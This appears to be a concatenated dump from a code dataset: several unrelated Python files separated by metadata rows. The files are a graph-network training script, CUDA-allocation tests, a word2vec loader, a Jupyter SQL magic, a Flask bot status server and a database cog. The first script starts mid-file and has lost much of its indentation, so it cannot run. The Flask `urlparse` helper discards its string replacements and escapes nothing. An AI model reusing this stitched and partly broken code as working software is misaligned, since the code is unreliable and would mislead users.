parser.add_argument('--epochs', default=200, type=int, help='Number of epochs to train. ')
parser.add_argument('--batch_size', default=64, type=int, help='Batch size')
parser.add_argument('--batch_parts', default=8, type=int, help='Batch parts')
# Learning process arguments
parser.add_argument('--cuda', default=1, type=int, help='Bool, use cuda')
parser.add_argument('--multigpu', default=0, type=int, help='Bool, use multigpu')
parser.add_argument('--lastgpu', default=0,type=int, help='Parameter to indicate what is the last gpu used')
parser.add_argument('--nworkers', default=4, type=int, help='Num subprocesses to use for data loading')
# Dataset
    parser.add_argument('--dataset_path', default='', type=str, help="Path to the dataset root folder")
    parser.add_argument('--dataset_folder', default='', type=str, help="Folder name that contains the h5 files")
    parser.add_argument('--train_split', default='list/train_list.txt', type=str, help="Train split list path")
    parser.add_argument('--test_split', default='list/test_list.txt', type=str, help="Test split list path")
parser.add_argument('--nfeatures', default='1', help='Number of features of point clouds')
parser.add_argument('--className',default='list/scenes_labels.txt', help = 'Path to the file that contains the name of the classes')
parser.add_argument('--dataset', default='nyu_v1', help='Dataset name')
# Results
parser.add_argument('--odir', default='./results', help='Directory to store results')
parser.add_argument('--exp_name', default='Scene_Categorization', help='Name of the experiment')
# Model
parser.add_argument('--model_config', default='', help='Defines the model as a sequence of layers.')
parser.add_argument('--seed', default=1, type=int, help='Seed for random initialisation')
# Point cloud processing
parser.add_argument('--pc_augm_input_dropout', default=0, type=float, help='Training augmentation: Probability of removing points in input point clouds')
parser.add_argument('--pc_augm_scale', default=0, type=float, help='Training augmentation: Uniformly random scaling in [1/scale, scale]')
parser.add_argument('--pc_augm_rot', default=1, type=int, help='Training augmentation: Bool, random rotation around z-axis')
parser.add_argument('--pc_augm_mirror_prob', default=0.5, type=float, help='Training augmentation: Probability of mirroring about x or y axes')
parser.add_argument('--pc_attribs', default='', type=str, help='Edge attribute definition')
parser.add_argument('--coordnode', default=0, type=int, help='Put coordinates in node feature')
# Filter generating network
parser.add_argument('--fnet_widths', default='[]', help='List of width of hidden filter gen net layers')
parser.add_argument('--fnet_llbias', default=0, type=int, help='Bool, use bias in the last layer in filter gen net')
parser.add_argument('--fnet_orthoinit', default=1, type=int, help='Bool, use orthogonal weight initialization for filter gen net')
parser.add_argument('--fnet_dropout', default=0, type=int, help='Int, use of dropout for filter gen net')
parser.add_argument('--fnet_batchnorm', default=0, type=int, help='Bool, use of batchnorm for filter gen net')
# agc
parser.add_argument('--agc_bias', default=0, type=int, help='Bool, use bias in agc ')
args = parser.parse_args()
args.fnet_widths = ast.literal_eval(args.fnet_widths)
args.betas = ast.literal_eval(args.betas)
# Seeding
utils.seed(args.seed)
# creating experiment folder and init path for checkpoints, logs, etc
exp_path = os.path.join(args.odir, args.dataset, args.dataset_folder, args.exp_name.replace(" ","_"))
print("The experiment will save to " + exp_path)
utils.create_folder(args.odir)
utils.create_folder(exp_path)
log_path = os.path.join(exp_path, 'log')
utils.create_folder(log_path)
log_train_path = os.path.join(log_path, 'train')
utils.create_folder(log_train_path)
log_test_path = os.path.join(log_path, 'test')
utils.create_folder(log_test_path)
checkpoint_path = os.path.join(exp_path, 'checkpoints')
utils.create_folder(checkpoint_path)
cm_path = os.path.join(exp_path, 'cm')
utils.create_folder(cm_path)
# saving command line used on this experiment
with open(os.path.join(exp_path, 'cmdline.txt'), 'w') as f:
f.write(" ".join(sys.argv))
# Tensorboard writters
train_writer = SummaryWriter(log_train_path)
test_writer = SummaryWriter(log_test_path)
    # Creating model
features = int(args.nfeatures)
model = models.GraphNetwork(args.model_config, features, args.multigpu,
args.fnet_widths, args.fnet_orthoinit,
args.fnet_llbias, default_edge_attr=args.pc_attribs,
default_agc_bias=args.agc_bias,
default_fnet_dropout=args.fnet_dropout,
default_fnet_batchnorm=args.fnet_batchnorm)
if args.multigpu != 1 and args.cuda != 0:
model.to('cuda:0')
print("GPU: ", torch.cuda.get_device_name(0))
print(model)
    # Optimizer
if args.optim == "adam":
optimizer = torch.optim.Adam(model.parameters(), lr=args.lr, betas=args.betas, weight_decay=args.wd)
elif args.optim == "sgd":
optimizer = torch.optim.SGD(model.parameters(), lr=args.lr, momentum = args.momentum, weight_decay=args.wd)
loss_criterion = torch.nn.CrossEntropyLoss()
    # Creating dataset and data loaders
label_path = os.path.join(args.dataset_path, args.className)
if not os.path.isfile(label_path):
raise RuntimeError("label file does not exists")
label_names = utils.read_string_list(label_path)
assert args.batch_size % args.batch_parts == 0
transform3d = {"dropout" : args.pc_augm_input_dropout,
"scale" : args.pc_augm_scale,
"rot" : args.pc_augm_rot,
"mirror" : args.pc_augm_mirror_prob}
train_dataset = H53DClassDataset(args.dataset_path, args.dataset_folder,
                                 args.train_split, transform3d=transform3d,
                                 coordnode=args.coordnode)
test_dataset = H53DClassDataset(args.dataset_path, args.dataset_folder,
                                args.test_split, coordnode=args.coordnode)
train_loader = torch_geometric.data.DataLoader(train_dataset,
                                               batch_size=args.batch_size // args.batch_parts,
                                               num_workers=args.nworkers,
                                               shuffle=True,
                                               drop_last=True,
                                               pin_memory=True)
test_loader = torch_geometric.data.DataLoader(test_dataset,
                                              batch_size=args.batch_size // args.batch_parts,
                                              num_workers=args.nworkers,
                                              shuffle=False,
                                              pin_memory=True)
is_best = False
best_acc = 0
start_epoch = 0
for epoch in range(start_epoch, args.epochs):
    print('Epoch {}/{} ({}):'.format(epoch, args.epochs, args.exp_name))
    train_loss, train_cm = train(model, train_loader,
                                 loss_criterion,
                                 optimizer,
                                 label_names,
                                 batch_parts=args.batch_parts,
                                 cuda=args.cuda)
    train_acc = train_cm.accuracy()
    gpu_mem_train = utils.max_gpu_allocated()
    train_writer.add_scalar('Loss', train_loss, epoch)
    train_writer.add_scalar('Accuracy', train_acc, epoch)
    train_writer.add_scalar('Learning_Rate', utils.get_learning_rate(optimizer)[0], epoch)
    for i in range(torch.cuda.device_count()):
        train_writer.add_scalar('GPU%02d_Memory' % i, gpu_mem_train[i], epoch)
    torch.cuda.empty_cache()
    print('-> Train:\tAccuracy: {}, \tLoss: {}'.format(train_acc, train_loss))
    test_loss, test_cm = val(model, test_loader,
                             loss_criterion,
                             label_names,
                             cuda=args.cuda)
    test_acc = test_cm.accuracy()
    gpu_mem_test = utils.max_gpu_allocated()
    test_writer.add_scalar('Loss', test_loss, epoch)
    test_writer.add_scalar('Accuracy', test_acc, epoch)
    for i in range(torch.cuda.device_count()):
        test_writer.add_scalar('GPU%02d_Memory' % i, gpu_mem_test[i], epoch)
    torch.cuda.empty_cache()
    print('-> Test:\tAccuracy: {}, \tLoss: {}'.format(test_acc, test_loss))
    is_best = test_acc > best_acc
    if is_best:
        best_acc = test_acc
        test_writer.add_text('Best Accuracy', str(np.round(best_acc.item(), 2)), epoch)
    utils.save_checkpoint(epoch, model, optimizer, test_acc, is_best, best_acc,
                          checkpoint_path, save_all=False)
    cm_file_name = os.path.join(cm_path, "cm_epoch_%i.npy" % epoch)
    test_cm.save_npy(cm_file_name)
    if math.isnan(test_loss) or math.isnan(train_loss): break
    del test_loss, test_acc, test_cm, train_loss, train_acc, train_cm, gpu_mem_train, gpu_mem_test
    gc.collect()
train_writer.close()
test_writer.close()
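# Example invocation (a sketch -- the script name and flag values are
# illustrative, not project defaults):
#   python train.py --optim adam --epochs 100 --batch_size 32 --batch_parts 4 \
#       --pc_augm_scale 1.1 --fnet_widths "[128,128]"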
| 43.534653 | 157 | 0.613145 | 1,625 | 13,191 | 4.783385 | 0.200615 | 0.040525 | 0.076547 | 0.013508 | 0.328702 | 0.253441 | 0.22025 | 0.176766 | 0.15824 | 0.108581 | 0 | 0.008967 | 0.272913 | 13,191 | 302 | 158 | 43.678808 | 0.801481 | 0.034038 | 0 | 0.206573 | 0 | 0 | 0.158723 | 0.005191 | 0 | 0 | 0 | 0 | 0.004695 | 1 | 0.00939 | false | 0 | 0.084507 | 0 | 0.103286 | 0.028169 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2cdfe4d7758eb0b52547db2002c039a639a0bf1 | 3,341 | py | Python | tests/common/test_spark_inference_common.py | nateagr/ml-hadoop-experiment | a821199f5321019d6e2bcfb9c4979b66d2d14324 | [
"Apache-2.0"
] | 1 | 2022-03-30T15:16:39.000Z | 2022-03-30T15:16:39.000Z | tests/common/test_spark_inference_common.py | nateagr/ml-hadoop-experiment | a821199f5321019d6e2bcfb9c4979b66d2d14324 | [
"Apache-2.0"
] | null | null | null | tests/common/test_spark_inference_common.py | nateagr/ml-hadoop-experiment | a821199f5321019d6e2bcfb9c4979b66d2d14324 | [
"Apache-2.0"
] | 1 | 2022-03-14T09:19:54.000Z | 2022-03-14T09:19:54.000Z | import os
import tempfile
import fcntl
from contextlib import contextmanager
import json
from typing import Dict, List
import mock
import pytest
from ml_hadoop_experiment.common.spark_inference import get_cuda_device, CUDA_DEVICE_ENV
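# These tests exercise get_cuda_device, which (as exercised here) hands out
# CUDA device ids to worker processes through a lock file plus a JSON
# allocation file; both paths are injected below so no real GPU is needed.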
def test_get_cuda_device_without_allocation():
    with tempfile.NamedTemporaryFile() as lock_tmp, \
            tempfile.TemporaryDirectory() as tmp_dir, \
            _file_locking_mock():
        allocation_tmp = os.path.join(tmp_dir, "allocation")
        device = get_cuda_device(
            n_gpus=3, lock_file=lock_tmp.name, allocation_file=allocation_tmp
        )
        assert device == 0
@pytest.mark.parametrize(
    "alloc_map,pid,expected_cuda_device",
    [
        ({0: [2]}, 1, 1),
        ({1: [2]}, 2, 1),
        ({0: [2], 2: [1]}, 3, 1),
        ({0: [2], 1: [3], 2: [1]}, 4, 0),
        ({0: [1, 2], 1: [3], 2: [4, 5]}, 6, 1)
    ]
)
def test_get_cuda_device_with_existing_allocations(alloc_map, pid, expected_cuda_device):
    all_pids = []
    for pids in alloc_map.values():
        all_pids.extend(pids)
    cuda_device = _run_test_get_cuda_device(
        existing_allocs=alloc_map, pid=pid, existing_pids=all_pids, n_gpus=3
    )
    assert cuda_device == expected_cuda_device
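# Semantics inferred from the cases above (an assumption, not documented API):
# keys of alloc_map are GPU ids, values are the PIDs holding them, and a new
# PID receives the GPU with the fewest live holders, ties going to the lowest id.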
def test_get_cuda_device_reuse_allocation_of_previous_pid():
    cuda_device = _run_test_get_cuda_device(
        existing_allocs={0: [1], 1: [2], 2: [3]}, pid=4, existing_pids=[1, 3], n_gpus=3
    )
    assert cuda_device == 1
def test_get_cuda_device_caches_cuda_device():
    cleanup()
    with mock.patch("ml_hadoop_experiment.common.spark_inference._get_cuda_device") \
            as _get_cuda_device_mock, \
            mock.patch("ml_hadoop_experiment.common.spark_inference.os.getpid") as getpid_mock:
        _get_cuda_device_mock.return_value = 0
        getpid_mock.return_value = 0
        cuda_device = get_cuda_device(n_gpus=1)
        assert cuda_device == get_cuda_device(n_gpus=1)
        _get_cuda_device_mock.assert_called_once()
def _run_test_get_cuda_device(
    existing_allocs: Dict[int, List[int]], pid: int, existing_pids: List[int],
    n_gpus: int
) -> int:
    cleanup()
    with tempfile.NamedTemporaryFile() as lock_tmp, \
            tempfile.NamedTemporaryFile() as allocation_tmp, \
            mock.patch("ml_hadoop_experiment.common.spark_inference.os.getpid") as getpid_mock, \
            mock.patch(
                "ml_hadoop_experiment.common.spark_inference._get_all_pids"
            ) as all_pids_mock, \
            _file_locking_mock():
        with open(allocation_tmp.name, "w+") as fd:
            fd.write(json.dumps(existing_allocs))
        getpid_mock.return_value = pid
        all_pids_mock.return_value = existing_pids
        return get_cuda_device(
            n_gpus=n_gpus, lock_file=lock_tmp.name, allocation_file=allocation_tmp.name
        )
@contextmanager
def _file_locking_mock():
    with mock.patch("ml_hadoop_experiment.common.spark_inference.fcntl") as fcntl_mock:
        yield
    # Assert that an exclusive lock was taken and released exactly once.
    fcntl_mock.lockf.assert_called_once()
    assert fcntl_mock.lockf.call_args_list == [mock.call(mock.ANY, fcntl.LOCK_EX)]
    fcntl_mock.flock.assert_called_once()
    assert fcntl_mock.flock.call_args_list == [mock.call(mock.ANY, fcntl.LOCK_UN)]
def cleanup():
    if CUDA_DEVICE_ENV in os.environ:
        del os.environ[CUDA_DEVICE_ENV]
| 34.091837 | 97 | 0.679737 | 469 | 3,341 | 4.458422 | 0.198294 | 0.13869 | 0.099474 | 0.056911 | 0.499761 | 0.448111 | 0.349594 | 0.288379 | 0.260641 | 0.064084 | 0 | 0.01904 | 0.214008 | 3,341 | 97 | 98 | 34.443299 | 0.777228 | 0 | 0 | 0.098765 | 0 | 0 | 0.095181 | 0.091589 | 0 | 0 | 0 | 0 | 0.08642 | 1 | 0.08642 | false | 0 | 0.111111 | 0 | 0.209877 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2d0fbf897441b938a8a5cc09355bf7740db8093 | 577 | py | Python | OpenAttack/data/word2vec.py | zangy17/OpenAttack | 9114a8af12680f14684d2bf1bc6a5c5e34f8932c | [
"MIT"
] | 10 | 2021-12-01T15:35:05.000Z | 2022-03-16T16:10:24.000Z | OpenAttack/data/word2vec.py | zangy17/OpenAttack | 9114a8af12680f14684d2bf1bc6a5c5e34f8932c | [
"MIT"
] | null | null | null | OpenAttack/data/word2vec.py | zangy17/OpenAttack | 9114a8af12680f14684d2bf1bc6a5c5e34f8932c | [
"MIT"
] | null | null | null | """
:type: OpenAttack.utils.WordVector
:Size: 1.52GB
Word2vec Word Embedding `[page] <https://code.google.com/archive/p/word2vec/>`__
"""
import numpy as np
import os, pickle
from OpenAttack.utils import WordVector, make_zip_downloader
NAME = "AttackAssist.Word2Vec"
URL = "https://cdn.data.thunlp.org/TAADToolbox/word2vec.zip"
DOWNLOAD = make_zip_downloader(URL)
def LOAD(path):
    # Use context managers so the pickle files are closed after loading.
    with open(os.path.join(path, "word2id.pkl"), "rb") as f:
        word2id = pickle.load(f)
    with open(os.path.join(path, "wordvec.pkl"), "rb") as f:
        wordvec = pickle.load(f)
    return WordVector(word2id, wordvec)
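# Minimal usage sketch (assumes the zip has already been fetched and extracted
# to `path`, e.g. by the DOWNLOAD callable above):
#   wv = LOAD("/path/to/extracted/word2vec")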
| 27.47619 | 80 | 0.722704 | 79 | 577 | 5.202532 | 0.582278 | 0.072993 | 0.082725 | 0.077859 | 0.136253 | 0.136253 | 0.136253 | 0 | 0 | 0 | 0 | 0.019724 | 0.121317 | 577 | 20 | 81 | 28.85 | 0.790927 | 0.225303 | 0 | 0 | 0 | 0 | 0.225513 | 0.047836 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.3 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2d24631e0565e56e51cf9955017aaa1f1066a38 | 3,334 | py | Python | maxcompute.py | marufeuille/jupyter-pyodps | aecdf4e1e8dfdcf206e0ca4b24902a9f8e7ddc6e | [
"BSD-2-Clause"
] | 2 | 2019-10-11T00:24:27.000Z | 2022-01-28T03:48:44.000Z | maxcompute.py | marufeuille/jupyter-pyodps | aecdf4e1e8dfdcf206e0ca4b24902a9f8e7ddc6e | [
"BSD-2-Clause"
] | null | null | null | maxcompute.py | marufeuille/jupyter-pyodps | aecdf4e1e8dfdcf206e0ca4b24902a9f8e7ddc6e | [
"BSD-2-Clause"
] | null | null | null | from IPython.core.magic import (Magics, magics_class, line_magic, cell_magic)
from IPython.core.magic import (register_line_magic, register_cell_magic)
from io import StringIO
import os
from odps import ODPS
import pandas as pd
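# Usage sketch once this file is importable as `maxcompute` (an assumption;
# the table name is illustrative):
#   %load_ext maxcompute
#   %%odps
#   SELECT * FROM my_table LIMIT 10;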
@magics_class
class ODPSMagic(Magics):
    def __init__(self, shell, odps):
        super(ODPSMagic, self).__init__(shell)
        # This attribute shares its name with the `odps` cell magic below; the
        # magic is bound during super().__init__(), so the assignment does not
        # break registration.
        self.odps = odps
    @cell_magic
    def odps(self, line, cell):
        sql = StringIO(cell).getvalue()
        column = []
        fields = []
        instance = self.odps.execute_sql(sql)
        if sql[0:4].upper() == "DROP" or sql[0:6].upper() == "CREATE" or sql[0:6].upper() == "INSERT":
            if instance.is_successful():
                return "Successfully finished {}".format(sql.strip())
            else:
                return "Error occurred while running {}".format(sql.strip())
        with instance.open_reader() as reader:
            if sql[0:4].upper() == "DESC":
                # DESC returns an ASCII-art table; parse its header and field rows.
                field_flag = False
                idx = 1
                for record in reader:
                    for field in record:
                        if field[1][0:2] == "+-":
                            continue  # skip the +---+ border rows
                        if field_flag:
                            x = field[1][1:-1].split("|")
                            column.append("FieldName-{}".format(idx))
                            fields.append(x[0].strip())
                            column.append("FieldType-{}".format(idx))
                            fields.append(x[1].strip())
                            idx += 1
                        else:
                            for item in field[1][1:-1].strip().split("|"):
                                x = item.split(":", 1)
                                if x[0].strip() == "Field":
                                    field_flag = True
                                    break
                                if len(x) == 1:
                                    continue
                                column.append(x[0].strip())
                                fields.append(x[1].strip() if len(x) == 2 else "")
                return pd.DataFrame([fields], columns=column)
            else:  # SELECT
                for record in reader:
                    c = []
                    f = []
                    for field in record:
                        c.append(field[0])
                        f.append(field[1])
                    if len(column) == 0:
                        column = c
                    fields.append(f)
                return pd.DataFrame(fields, columns=column)
def load_ipython_extension(ipython):
    params = {}
    for key in ("AccessKeyId", "AccessKeySecret", "Project", "Endpoint"):
        val = os.getenv(key)
        if val:
            params[key] = val
    path = os.path.expanduser("~") + "/.aliyun_profile"
    if os.path.exists(path):
        with open(path) as f:
            for item in f.read().strip().split("\n"):
                key, param = item.split("=", 1)
                params[key] = param
    # Require all four settings, whether they came from the environment or
    # from the profile file.
    if len(params) != 4:
        raise ValueError("Missing ODPS settings: AccessKeyId, AccessKeySecret, Project and Endpoint are all required")
    myodps = ODPS(params["AccessKeyId"], params["AccessKeySecret"], params["Project"], endpoint=params["Endpoint"])
    magic = ODPSMagic(ipython, myodps)
    ipython.register_magics(magic)
| 38.767442 | 115 | 0.456509 | 339 | 3,334 | 4.41003 | 0.300885 | 0.010702 | 0.026087 | 0.026756 | 0.161204 | 0.048161 | 0 | 0 | 0 | 0 | 0 | 0.016537 | 0.419616 | 3,334 | 86 | 116 | 38.767442 | 0.756072 | 0.0018 | 0 | 0.118421 | 0 | 0 | 0.064923 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039474 | false | 0 | 0.078947 | 0 | 0.184211 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0
a2d2d52443d085a6b04c9a7dc3ca757c56edef2a | 6,273 | py | Python | startServer.py | Fifi-Bot/Fifi | 49eb4f34e945976d5e8928c4ebd4bb8f18e89e0e | [
"MIT"
] | 3 | 2021-06-07T04:06:16.000Z | 2021-06-07T04:35:15.000Z | startServer.py | Fifi-Bot/Fifi | 49eb4f34e945976d5e8928c4ebd4bb8f18e89e0e | [
"MIT"
] | 2 | 2021-06-08T05:38:43.000Z | 2021-06-08T15:49:31.000Z | startServer.py | Fifi-Bot/Fifi | 49eb4f34e945976d5e8928c4ebd4bb8f18e89e0e | [
"MIT"
] | 1 | 2021-06-07T04:14:27.000Z | 2021-06-07T04:14:27.000Z | """
MIT License
Copyright (c) 2021 Meme Studios
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from flask import Flask, redirect, render_template
from threading import Thread
#app = Flask('')
def urlparse(url) -> str:
url = str(url)
url.replace(" ", "+")
url.replace("`", "%60")
url.replace("@", "%40")
url.replace("#", "%23")
url.replace("$", "%24")
url.replace("%", "%25")
url.replace("^", "%5E")
url.replace("&", "%26")
url.replace("+", "%2B")
url.replace("=", "%3D")
url.replace("|", "%7C")
url.replace("\\", "%5C")
url.replace("[", "%5B")
url.replace("]", "%5D")
url.replace("{", "%7B")
url.replace("}", "%7D")
url.replace(":", "%3A")
url.replace(";", "%3B")
url.replace("'", "%27")
url.replace(",", "%2C")
url.replace("/", "%2F")
url.replace("?", "%3F")
return url
setFavicon = """
<link rel="Fifi Icon" type="image/png" href="https://cdn.discordapp.com/attachments/749875006238097478/833898070571614228/fifi_icon_transparent_background_revised_revised.png"/>
"""
setFont = """
<link href='https://fonts.googleapis.com/css?family=Comfortaa' rel='stylesheet'>
html {
font-family: 'Comfortaa';
margin: 0 auto;
}
"""
def commandSignature(command):
clean_prefix = "f."
if not command.signature and not command.parent:
return f'"{clean_prefix}{command.name}"'
if command.signature and not command.parent:
return f'"{clean_prefix}{command.name} {command.signature}"'
if not command.signature and command.parent:
return f'"{clean_prefix}{command.parent} {command.name}"'
else:
return f'"{clean_prefix}{command.parent} {command.name} {command.signature}"'
msInvite = "https://discord.gg/3c5kc8M"
from replit import db
#gitbook = db['gitbook']
class FifiServer(Flask):
def __init__(self, bot):
super().__init__('Fifi')
self.bot = bot
#self.app = app
self.route("/")(self.main)
self.route("/status")(self.status)
self.route("/redirect")(self._redirect)
self.route("/stats")(self.status)
self.route("/commands")(self.commands)
self.route("/command")(self.commands)
self.route("/guild")(self.guildInvite)
self.route("/server")(self.guildInvite)
self.route("/suport")(self.guildInvite)
self.route("/invite")(self.botInvite)
self.route("/invites")(self.botInvite)
self.errorhandler(404)(self.unknownPage)
self.route("/license")(self.license)
self.route("/copyright")(self.license)
def unknownPage(self, e):
return render_template('unknown.html')
def license(self):
return """
MIT License
<br><br>
Copyright (c) 2021 Meme Studios
<br><br>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish,distribute, sublicense, and/or sellcopies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
<br><br>
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
<br><br>
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
def _redirect(self, url):
url = urlparse(url)
return redirect(url)
def botInvite(self):
return render_template('botInvite.html')
def guildInvite(self):
return redirect(f"{msInvite}")
#@app.route("/")
def main(self):
return render_template("main.html") #Get html and display it. yey
#@app.route("/status")
def status(self):
return redirect("https://stats.uptimerobot.com/w7OgnCLQz7")
def commands(self):
s = f"{setFavicon}Note:<br>Arguments with <> means that the argument is required.<br>Arguments with [] means that the argument is optional.<br>DO NOT USE THESE WHEN TYPING COMMANDS<br><br>"
for command in self.bot.commands:
s += f"""
Command {command.name}: <br>- Syntax: {commandSignature(command)}<br>- Aliases: {' | '.join(command.aliases)[:-3]}<br>
"""
if command.cog is None:
s += "- Cog: No Category/None"
else:
s += f"- Cog: {command.cog.qualified_name}"
s += "<br>"
if command._buckets._cooldown is None:
s += "- Cooldown: None"
else:
s += f"""
- Cooldown: <br> - Rate (How long the cooldown lasts in seconds): {command._buckets._cooldown.rate} <br> - Per (How many commands can be triggered before the cooldown hits): {command._buckets._cooldown.per} <br> - Type: Each {str(command._buckets._cooldown.type).lower().replace('commands', '').replace('buckettype', '').replace('.', '').title()}
"""
s += "<br><br>"
return s
def start(self):
server = Thread(target=self.run)
server.start()
def run(self):
super().run(host="0.0.0.0", port=8080) | 37.562874 | 460 | 0.688985 | 862 | 6,273 | 4.975638 | 0.293503 | 0.051294 | 0.012124 | 0.016787 | 0.468641 | 0.450222 | 0.450222 | 0.44719 | 0.410352 | 0.410352 | 0 | 0.017215 | 0.166587 | 6,273 | 167 | 461 | 37.562874 | 0.803175 | 0.188905 | 0 | 0.12069 | 0 | 0.068966 | 0.528763 | 0.082939 | 0 | 0 | 0 | 0 | 0 | 1 | 0.112069 | false | 0 | 0.025862 | 0.051724 | 0.258621 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2d301c47bada44e9826e5be19390403221e5d1a | 984 | py | Python | bot/cogs/database.py | marlondgonzalez/discordbot | 4048a006bdf86084312a6f6b581a0daf8a080efe | [
"MIT"
] | null | null | null | bot/cogs/database.py | marlondgonzalez/discordbot | 4048a006bdf86084312a6f6b581a0daf8a080efe | [
"MIT"
] | null | null | null | bot/cogs/database.py | marlondgonzalez/discordbot | 4048a006bdf86084312a6f6b581a0daf8a080efe | [
"MIT"
] | null | null | null | # Import libraries
import os
import asyncpg
import asyncio
import discord
from dotenv import load_dotenv
from discord.ext import commands, tasks
# Load Env Variables
load_dotenv()
DISCORD_TOKEN = os.getenv("DISCORD_TOKEN")
DATABASE_URL = os.getenv("DATABASE_URL")
class Database(commands.Cog):
def __init__(self, clientbot):
self.clientbot = clientbot
async def createDataBasePool(self):
self.clientbot.pg_con = await asyncpg.create_pool(DATABASE_URL)
print("Establishing connection to database")
await self.clientbot.pg_con.execute("CREATE TABLE IF NOT EXISTS TestRun (UserID bigint, GuildID bigint, UserName varchar(255));")
await self.clientbot.pg_con.execute("CREATE TABLE IF NOT EXISTS Sample (UserID bigint, GuildID bigint, ArgumentName varchar(255), Content text);")
def setup(clientbot):
database = Database(clientbot)
clientbot.add_cog(database)
clientbot.loop.run_until_complete(database.createDataBasePool())
| 35.142857 | 154 | 0.761179 | 125 | 984 | 5.848 | 0.456 | 0.088919 | 0.06156 | 0.073871 | 0.142271 | 0.142271 | 0.142271 | 0.142271 | 0.142271 | 0.142271 | 0 | 0.007186 | 0.151423 | 984 | 27 | 155 | 36.444444 | 0.868263 | 0.035569 | 0 | 0 | 0 | 0.047619 | 0.27167 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.285714 | 0 | 0.428571 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2d92e4afd67135fc8c61510bcaef3612a2fd653 | 6,142 | py | Python | spherephize/visualize_sphere.py | kathlandgren/spheriphize | 7148ee206c3294f34594ca0cfe28c1bacef3152f | [
"MIT"
] | 1 | 2021-06-25T21:20:55.000Z | 2021-06-25T21:20:55.000Z | spherephize/visualize_sphere.py | kathlandgren/spheriphize | 7148ee206c3294f34594ca0cfe28c1bacef3152f | [
"MIT"
] | null | null | null | spherephize/visualize_sphere.py | kathlandgren/spheriphize | 7148ee206c3294f34594ca0cfe28c1bacef3152f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Jun 23 11:51:58 2021
@author: Kath Landgren
This module contains the Sphere class and the visualization code
"""
import numpy as np
import plotly.graph_objects as go
class Sphere:
"""
Class Sphere
Parameters
----------
num_lat : int
Positive integer, number of latitudes.
num_lon : int
Positive integer, number of longitudes.
temp_type : string
A string: "uniform", "zonal", or "custom".
"""
#init method
def __init__(self, num_lat,num_lon,temp_type):
"""Constructor method
Parameters
----------
num_lat : int
Positive integer, number of latitudes.
num_lon : int
Positive integer, number of longitudes.
temp_type : string
A string: "uniform", "zonal", or "custom".
"""
np.seterr(divide='ignore', invalid='ignore')
self.num_lat=num_lat
self.num_lon=num_lon
self.temp_type=temp_type
assert type(temp_type)==str, "Temperature type must be a string specifying accepted temperature types"
def make_lat(self):
"""
Creates an array of latitudes based on the number of latitudes
Returns
-------
